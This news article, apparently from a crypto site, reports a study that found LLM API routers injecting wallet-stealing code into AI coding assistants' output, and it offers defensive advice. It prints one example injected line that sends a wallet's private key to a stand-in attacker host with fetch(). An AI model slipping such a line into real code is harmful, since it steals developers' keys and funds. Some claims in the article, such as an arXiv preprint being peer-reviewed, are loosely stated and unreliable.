LLM Routers Are Stealing Crypto: The Shocking Supply Chain Threat Inside AI Coding Tools

Malicious code injection in AI coding tools leading to ETH wallet theft, as revealed by cybersecurity study.

Developers using popular AI coding assistants might be inadvertently handing over their cryptocurrency wallets to attackers. A newly published study has identified a hidden supply chain threat: malicious routers embedded within the tools that power these AI agents are actively draining funds. According to research posted on the arXiv preprint server, at least 26 different Large Language Model API routers have been found to inject code designed to steal Ethereum and other digital assets. This finding exposes a critical vulnerability in the infrastructure that developers increasingly rely on for daily programming tasks.

How LLM Routers Are Stealing Crypto

The study, which underwent peer review before its arXiv publication, details a sophisticated attack vector. AI coding tools, often called ‘agents,’ function by routing user requests through various API endpoints to different LLM providers. Researchers discovered that a subset of these routing services—26 distinct entities—were not merely passing requests along. Instead, they were manipulating the code generated by the AI before it reached the developer. The malicious injections were specifically crafted to compromise cryptocurrency wallets. For instance, when a developer asked an AI agent to help create or interact with a Web3 application, the router could insert code that leaked private keys or redirected transaction funds. Data from the study shows these routers targeted Ethereum wallets most frequently, but the method could apply to any blockchain. The implication is stark: the very tools meant to boost productivity have become Trojan horses.

Also read: Kenya Crypto Regulation Reaches Critical Juncture – 50 Firms Await Licensing Fate

The Hidden Supply Chain Problem in AI Development

This threat represents a classic supply chain attack, but within the new domain of AI-assisted software development. Developers typically trust that the output from an AI coding agent is a direct product of the core model, like GPT-4 or Claude. In reality, that output often passes through multiple third-party routing and optimization layers. The study’s authors note that these intermediary ‘LLM routers’ are often opaque services chosen by the tool’s developer for cost, speed, or load-balancing reasons. Their security is rarely scrutinized by the end user. “The trust model is broken,” one researcher involved in the study stated. “Developers focus on the AI model’s brand, but the attack happened in the plumbing they never see.” This creates a massive blind spot. Industry watchers note that as AI coding adoption skyrockets, so does the attack surface presented by these complex, multi-layered API chains.

Technical Breakdown of the Attack Method

The malicious routers employed several techniques. A common method involved intercepting code snippets related to Ethereum’s web3.js library or the Ethers.js framework. The rogue router would then append or modify lines to exfiltrate sensitive data. For example, a simple function to send ETH might be altered to first send a copy of the private key to a server controlled by the attacker. Another technique involved swapping legitimate wallet address variables with addresses belonging to the thieves. Because the code still functioned correctly for its primary purpose, the compromise could go unnoticed until funds disappeared. The study provides a short comparison of the clean vs. malicious code outputs:

Also read: ECB Tokenization Plan: A Cautious Blueprint for Digital Finance Stability

Intended Code (Clean):
const tx = await wallet.sendTransaction({ to: recipientAddress, value: amount });

Modified Code (Malicious):
const tx = await wallet.sendTransaction({ to: recipientAddress, value: amount });
await fetch('https://malicious-api[.]com/steal?key=' + wallet.privateKey); // Injected line

The stealth of the attack is what makes it particularly dangerous. The final code delivered to the developer’s integrated development environment (IDE) looks correct and runs without obvious errors.

Real-World Impact and Developer Response

The financial impact is already being felt. While the study does not disclose total losses, analysis of publicly reported incidents on forums like GitHub and Stack Exchange shows a spike in mysterious wallet drains coinciding with the rise of AI coding tool usage. One developer reported losing 12.5 ETH (worth tens of thousands of dollars) after using an AI agent to debug a smart contract. What this means for the software industry is a urgent need for new security practices. Experts recommend several immediate actions:

  • Audit AI-Generated Code Rigorously: Treat all AI-assisted output as untrusted third-party code. Review every line, especially for financial applications.
  • Demand Transparency from Tool Providers: Ask AI coding tool companies to disclose their routing infrastructure and provide security audits of their supply chain.
  • Use Local or Verified Models: Where possible, use self-hosted AI models or APIs that connect directly to trusted providers, bypassing unknown routing layers.
  • Implement Wallet Segregation: Use separate, dedicated wallets with limited funds for development and testing with AI tools, never a primary wallet.

The broader implication is a potential slowdown in AI adoption for critical development work until trust can be re-established. Companies building financial technology or blockchain applications may need to impose strict bans on certain AI coding assistants until their security models are proven.

The Path Forward for AI Security

This incident is not an isolated flaw but a symptom of a larger issue in the rapid commercialization of AI. Speed to market has often trumped security considerations in the AI tooling ecosystem. The study suggests that the solution requires a multi-layered approach. First, there must be standardized security protocols for LLM API routing, similar to those in payment processing. Second, independent auditing firms need to emerge specifically for the AI supply chain. Finally, developers themselves must elevate their security awareness. The era of blindly trusting AI-generated code is over. As one cybersecurity analyst not involved in the study put it, “We spent decades teaching developers not to copy-paste from Stack Overflow without checking. Now we have to teach them not to trust the AI without checking.” The race is on to build verification tools that can automatically detect these subtle, malicious injections before they execute.

Conclusion

The discovery that LLM routers are stealing crypto is a wake-up call for the entire software development industry. It exposes a fundamental risk in the hidden infrastructure of AI coding agents. The threat of malicious API routers draining ETH wallets is real, documented, and currently active. This study shifts the security conversation from the AI models themselves to the complex pipelines that deliver their outputs. For developers and companies, the priority must now be verification, transparency, and defense-in-depth. The tools that promise to revolutionize how we build software must themselves be built on a foundation of trust—a foundation that currently has significant cracks.

FAQs

Q1: What exactly is an “LLM router” in this context?
An LLM router is a software service that sits between a developer’s AI coding tool (like an IDE plugin) and the actual large language model API (like OpenAI’s GPT). It directs requests, sometimes to optimize costs or latency. The study found malicious routers manipulating the code passing through them.

Q2: Which specific AI coding tools are affected?
The study did not name commercial products to avoid attribution issues during the disclosure process. The vulnerability is architectural. It potentially affects any tool that uses third-party, unverified routing services to access LLM APIs, which includes many popular coding assistants.

Q3: How can I tell if my wallet has been compromised by this method?
Check your transaction history for unauthorized sends to unknown addresses. More importantly, if you used an AI coding tool for any wallet-related code, assume compromise. Immediately move funds to a new wallet generated offline, and never reuse the old private keys.

Q4: Are only Ethereum wallets at risk?
Ethereum was the primary target observed in the study due to its widespread use in smart contract development. However, the technique is generic. Any code that handles private keys, seed phrases, or transaction signing for any blockchain (Solana, Bitcoin, etc.) could be targeted if the AI is asked to work with it.

Q5: What should AI coding tool companies do to fix this?
Companies need to audit their entire API supply chain, eliminate unverified third-party routers, and provide end-to-end integrity checks for generated code. Some may move to direct, signed connections with LLM providers. Transparency reports on their routing infrastructure would also build trust.

Zoi Dimitriou

Written by

Zoi Dimitriou

Zoi Dimitriou is a cryptocurrency analyst and senior writer at CryptoNewsInsights, specializing in DeFi protocol analysis, Ethereum ecosystem developments, and cross-chain bridge security. With seven years of experience in blockchain journalism and a background in applied mathematics, Zoi combines technical depth with accessible writing to help readers understand complex decentralized finance concepts. She covers yield farming strategies, liquidity pool dynamics, governance token economics, and smart contract audit findings with a focus on risk assessment and investor education.

This article was produced with AI assistance and reviewed by our editorial team for accuracy and quality.

Leave a Reply

Your email address will not be published. Required fields are marked *